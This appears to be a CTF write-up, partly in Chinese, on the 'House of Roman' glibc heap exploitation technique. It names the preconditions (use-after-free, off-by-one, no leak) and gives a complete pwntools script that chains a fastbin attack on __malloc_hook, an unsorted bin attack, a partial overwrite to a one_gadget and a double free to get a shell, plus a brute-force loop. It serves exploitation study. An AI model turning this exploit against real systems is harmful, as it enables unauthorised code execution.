House of Roman


House of Roman 主要是利用了 &main_arena+0x58 和一些 one_gadget位置接近只要partial write 就可以不需要leak.

  • UAF
  • control size(any_size_malloc   off by one   overflow)
  • no leak

mainly: fast bin atk unsorted bin atk partial write




  • Noleak
  • malloc 任意大小chunk
  • 可以覆盖next_chunk_size
    read(0, heap_ptrs[v1], v2 + 1);
  • UAF
    if ( v0 <= 19 )


  • fastbin atk to control malloc_hook
  • unsorted bin to make malloc_hook=&main_arena+0x58
  • partial write malloc_hook to one_gadget
  • use printerr to make esp+0x50=0 to get shell


    ```python from pwn import * #context.log_level=”debug” def cmd(c): p.sendlineafter(“3. Free\n”,str(c)) def malloc(size,idx): cmd(1) p.sendlineafter(“Enter size of chunk :”,str(size)) p.sendlineafter(“Enter index :”,str(idx)) def free(idx): cmd(3) p.sendlineafter(“Enter index :”,str(idx)) def edit(idx,c): cmd(2) p.sendlineafter(“Enter index of chunk :”,str(idx)) p.sendafter(“Enter data :”,c) p=process(“./new_chall”)

p.readuntil(“Enter name :”) p.sendline(“nier”) #fastbin atk to control __malloc_hook malloc(0x140,0) malloc(0x18,1)# free(0) malloc(0x68,2) malloc(0x68,3) malloc(0x68,4) free(3) free(4) edit(4,”\x00”) edit(0,”\xed\x1a”) malloc(0x68,6) malloc(0x68,7) malloc(0x68,8)#control malloc__hook

#fixfastbin free(7) edit(7,p64(0)) #unsorted bin to make malloc_hook=&main_arena+0x58 malloc(0x58,10) malloc(0x88,11) malloc(0x88,12) free(11) edit(11,p64(0xdeadbeef)+’\x00’) malloc(0x88,13) #partial write malloc_hook to one_gadget edit(8,p64(0xdeadbeefdeadbeef)+”AAA”+p64(0xdddddddddddddfdd)+”\xa4\xd2\xaf”) #use printerr to make esp+0x50=0 to get shell free(12) free(12) #over try: p.interactive(“>”) except: p.close()

12bit burp:1/2^12 
for i in `seq 1 5000`; do python; done;